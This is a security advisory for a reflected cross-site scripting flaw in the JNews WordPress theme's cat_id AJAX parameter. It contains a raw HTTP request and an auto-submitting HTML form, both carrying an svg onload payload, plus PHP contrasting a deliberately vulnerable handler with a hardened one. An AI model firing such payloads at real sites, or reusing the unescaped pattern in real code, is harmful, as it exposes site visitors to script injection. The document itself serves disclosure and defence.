The theme did not sanitise the cat_id parameter of the POST request to /?ajax-request=jnews (with action=jnews_build_mega_category_*) before reflecting it in the response, leading to a Reflected Cross-Site Scripting (XSS) issue.
POST /?ajax-request=jnews HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Connection: close

lang=en_US&cat_id=6"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67

<html>
  <body>
    <form action="https://example.com/?ajax-request=jnews" method="POST">
      <input type="hidden" name="lang" value="en_US" />
      <input type="hidden" name="cat_id" value="6"><svg/onload=alert(/XSS/)>" />
      <input type="hidden" name="action" value="jnews_build_mega_category_2" />
      <input type="hidden" name="number" value="6" />
      <input type="hidden" name="tags" value="70,64,10,67" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
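As an added illustration of the bug class (not the theme's own code: the handler names, the markup and the data-cat-id attribute as the reflection sink are assumed), the unsafe reflection of cat_id beside a hardened version that validates the ID and escapes at the output sink; plain PHP stands in for the WordPress helpers absint() and esc_attr() so the block runs stand-alone:

```php
<?php
// Added illustration, not JNews code. Assumed: cat_id is reflected into an
// HTML attribute of the AJAX response. In WordPress the validation and
// escaping steps below correspond to absint() and esc_attr().

// Vulnerable pattern: the raw POST value is concatenated into HTML unescaped,
// so a value such as 6"><svg/onload=...> closes the attribute and injects markup.
function vulnerable_build_mega_category(array $post): string
{
    $cat_id = $post['cat_id'] ?? '';
    return '<div class="mega-category" data-cat-id="' . $cat_id . '"></div>';
}

// Hardened pattern: validate to the expected type, then escape at the sink.
function hardened_build_mega_category(array $post): ?string
{
    // cat_id is a category ID: accept only a positive integer string.
    // is_string() also rejects cat_id[]=... array submissions.
    $raw = $post['cat_id'] ?? '';
    if (!is_string($raw) || !ctype_digit($raw) || (int) $raw === 0) {
        return null; // caller should answer 400 instead of rendering
    }
    $cat_id = (int) $raw;
    // Escape at the output sink anyway (esc_attr() in WordPress), as defence in depth.
    $safe = htmlspecialchars((string) $cat_id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="mega-category" data-cat-id="' . $safe . '"></div>';
}

// Constructed request body using the payload from the advisory's proof of concept.
$request = ['cat_id' => '6"><svg/onload=alert(/XSS/)>'];
echo vulnerable_build_mega_category($request), PHP_EOL; // markup is injected
var_dump(hardened_build_mega_category($request));      // NULL: request rejected
var_dump(hardened_build_mega_category(['cat_id' => '6'])); // the only accepted shape
```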
Credit: Truoc Phan from Techlab Corporation
Published: 2021-05-24